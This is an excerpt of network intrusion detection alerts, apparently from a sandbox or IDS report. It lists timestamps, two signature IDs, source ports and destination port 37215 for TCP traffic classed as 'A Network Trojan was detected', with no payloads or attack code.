          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080414
          SID:2835222
          Source Port:59158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822471
          SID:2835222
          Source Port:53006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919091
          SID:2835222
          Source Port:50348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287295
          SID:2835222
          Source Port:48074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162073
          SID:2829579
          Source Port:50574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632601
          SID:2835222
          Source Port:33192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224722
          SID:2829579
          Source Port:58812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167223
          SID:2835222
          Source Port:36714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033748
          SID:2835222
          Source Port:40340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278803
          SID:2835222
          Source Port:57302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864467
          SID:2829579
          Source Port:54580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417840
          SID:2829579
          Source Port:53838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225079
          SID:2835222
          Source Port:37426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037794
          SID:2829579
          Source Port:45696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284594
          SID:2835222
          Source Port:47370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472287
          SID:2829579
          Source Port:60212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413144
          SID:2835222
          Source Port:51566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931482
          SID:2835222
          Source Port:37526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472196
          SID:2829579
          Source Port:49158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599197
          SID:2829579
          Source Port:50276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253125
          SID:2835222
          Source Port:44904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282456
          SID:2829579
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396952
          SID:2829579
          Source Port:52680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008117
          SID:2829579
          Source Port:43654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718869
          SID:2835222
          Source Port:46468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719519
          SID:2829579
          Source Port:38478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466688
          SID:2835222
          Source Port:59050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418228
          SID:2829579
          Source Port:56002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417384
          SID:2829579
          Source Port:49098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682036
          SID:2835222
          Source Port:34330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027462
          SID:2835222
          Source Port:60078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645013
          SID:2829579
          Source Port:56348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416168
          SID:2835222
          Source Port:52878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285541
          SID:2835222
          Source Port:51354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714991
          SID:2829579
          Source Port:55152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296466
          SID:2829579
          Source Port:60572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034576
          SID:2835222
          Source Port:56410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398810
          SID:2829579
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717919
          SID:2829579
          Source Port:47658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416263
          SID:2835222
          Source Port:58774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414103
          SID:2835222
          Source Port:53938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247352
          SID:2835222
          Source Port:58308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357565
          SID:2829579
          Source Port:40402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477537
          SID:2829579
          Source Port:51978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596927
          SID:2829579
          Source Port:36358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719729
          SID:2829579
          Source Port:46306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676293
          SID:2835222
          Source Port:42040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600415
          SID:2829579
          Source Port:53390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274315
          SID:2829579
          Source Port:47742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.647248
          SID:2829579
          Source Port:49822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280677
          SID:2835222
          Source Port:45436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286622
          SID:2835222
          Source Port:41936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230503
          SID:2835222
          Source Port:39854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.948983
          SID:2835222
          Source Port:41938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869033
          SID:2835222
          Source Port:38504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250583
          SID:2835222
          Source Port:56458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287260
          SID:2829579
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867122
          SID:2829579
          Source Port:49026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929219
          SID:2835222
          Source Port:37030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818799
          SID:2829579
          Source Port:57332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539841
          SID:2835222
          Source Port:34086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159499
          SID:2829579
          Source Port:41772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165201
          SID:2835222
          Source Port:49502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860619
          SID:2835222
          Source Port:52430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166399
          SID:2835222
          Source Port:55776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467734
          SID:2835222
          Source Port:59108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918132
          SID:2829579
          Source Port:42134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161803
          SID:2829579
          Source Port:44238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398563
          SID:2829579
          Source Port:45286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644228
          SID:2835222
          Source Port:36054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714970
          SID:2829579
          Source Port:56160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538649
          SID:2835222
          Source Port:60062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643455
          SID:2829579
          Source Port:37824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312404
          SID:2829579
          Source Port:50312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287945
          SID:2835222
          Source Port:55634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644298
          SID:2829579
          Source Port:55006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928396
          SID:2835222
          Source Port:33204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.088349
          SID:2829579
          Source Port:40546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950100
          SID:2835222
          Source Port:52168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925535
          SID:2829579
          Source Port:34006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718870
          SID:2829579
          Source Port:58430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719975
          SID:2835222
          Source Port:33758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206430
          SID:2829579
          Source Port:47140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291415
          SID:2835222
          Source Port:55570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472101
          SID:2829579
          Source Port:36072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267497
          SID:2829579
          Source Port:53518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895581
          SID:2835222
          Source Port:57868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719321
          SID:2829579
          Source Port:44256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714234
          SID:2835222
          Source Port:39094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539180
          SID:2829579
          Source Port:33836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987380
          SID:2829579
          Source Port:42198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396425
          SID:2835222
          Source Port:49080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909850
          SID:2829579
          Source Port:34706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993542
          SID:2829579
          Source Port:56442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077578
          SID:2829579
          Source Port:43816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283245
          SID:2829579
          Source Port:52136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035798
          SID:2829579
          Source Port:36424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249310
          SID:2835222
          Source Port:34224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166714
          SID:2829579
          Source Port:56230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944144
          SID:2829579
          Source Port:45662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396337
          SID:2829579
          Source Port:39700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038029
          SID:2829579
          Source Port:46008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560389
          SID:2835222
          Source Port:42328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076254
          SID:2829579
          Source Port:59474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563105
          SID:2835222
          Source Port:37986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920083
          SID:2829579
          Source Port:56776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909481
          SID:2829579
          Source Port:51658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468856
          SID:2835222
          Source Port:48634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027301
          SID:2829579
          Source Port:48684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164441
          SID:2829579
          Source Port:41410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417713
          SID:2835222
          Source Port:42842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946066
          SID:2829579
          Source Port:48824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227549
          SID:2835222
          Source Port:46556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721432
          SID:2829579
          Source Port:60044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998745
          SID:2829579
          Source Port:52158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818952
          SID:2829579
          Source Port:58394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274698
          SID:2829579
          Source Port:40278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035770
          SID:2829579
          Source Port:44346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032943
          SID:2829579
          Source Port:60668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477311
          SID:2829579
          Source Port:52698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415969
          SID:2829579
          Source Port:50026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242382
          SID:2835222
          Source Port:53982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397658
          SID:2835222
          Source Port:51560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596890
          SID:2829579
          Source Port:35890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867710
          SID:2829579
          Source Port:43344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165975
          SID:2829579
          Source Port:46500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909300
          SID:2829579
          Source Port:46976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205898
          SID:2829579
          Source Port:40420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166485
          SID:2835222
          Source Port:37748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166896
          SID:2835222
          Source Port:47968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905953
          SID:2829579
          Source Port:36204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713079
          SID:2835222
          Source Port:33664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246707
          SID:2835222
          Source Port:41826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818511
          SID:2829579
          Source Port:58950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602164
          SID:2835222
          Source Port:45632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538472
          SID:2829579
          Source Port:51364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163476
          SID:2835222
          Source Port:57274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081786
          SID:2835222
          Source Port:43054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948771
          SID:2829579
          Source Port:44070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724163
          SID:2829579
          Source Port:36262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288646
          SID:2835222
          Source Port:49796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564185
          SID:2829579
          Source Port:49324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081066
          SID:2835222
          Source Port:53000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645372
          SID:2829579
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227352
          SID:2835222
          Source Port:38626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865752
          SID:2829579
          Source Port:52550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920149
          SID:2829579
          Source Port:48816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720930
          SID:2829579
          Source Port:35930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419053
          SID:2829579
          Source Port:58858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282055
          SID:2829579
          Source Port:51584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.276746
          SID:2835222
          Source Port:35048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299199
          SID:2829579
          Source Port:36770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606826
          SID:2829579
          Source Port:47378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471507
          SID:2835222
          Source Port:41526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.013180
          SID:2829579
          Source Port:60232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719762
          SID:2835222
          Source Port:49908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.297021
          SID:2835222
          Source Port:47596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820467
          SID:2835222
          Source Port:38696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819849
          SID:2829579
          Source Port:58874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162590
          SID:2835222
          Source Port:36840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867323
          SID:2835222
          Source Port:51026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162805
          SID:2829579
          Source Port:51522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645767
          SID:2835222
          Source Port:45234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291307
          SID:2829579
          Source Port:34568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078513
          SID:2829579
          Source Port:45798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.917136
          SID:2829579
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132227
          SID:2835222
          Source Port:36262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.698499
          SID:2835222
          Source Port:52396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248709
          SID:2835222
          Source Port:47270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223580
          SID:2829579
          Source Port:58846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720465
          SID:2835222
          Source Port:37118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079378
          SID:2835222
          Source Port:33596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988465
          SID:2829579
          Source Port:55792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289211
          SID:2835222
          Source Port:35972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205834
          SID:2829579
          Source Port:41264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033626
          SID:2835222
          Source Port:41996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892873
          SID:2829579
          Source Port:58248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248921
          SID:2829579
          Source Port:37236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539212
          SID:2829579
          Source Port:38842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473811
          SID:2829579
          Source Port:57878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719168
          SID:2835222
          Source Port:38312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413587
          SID:2835222
          Source Port:44428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893864
          SID:2829579
          Source Port:52178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569440
          SID:2835222
          Source Port:58556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818112
          SID:2835222
          Source Port:49720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823661
          SID:2829579
          Source Port:56302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032896
          SID:2829579
          Source Port:43078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823010
          SID:2835222
          Source Port:41064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923127
          SID:2835222
          Source Port:34060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925194
          SID:2829579
          Source Port:46604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.984294
          SID:2835222
          Source Port:59796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715565
          SID:2835222
          Source Port:46664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539357
          SID:2835222
          Source Port:54958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928271
          SID:2835222
          Source Port:47276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538410
          SID:2835222
          Source Port:43266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398369
          SID:2829579
          Source Port:36984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946466
          SID:2829579
          Source Port:48976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
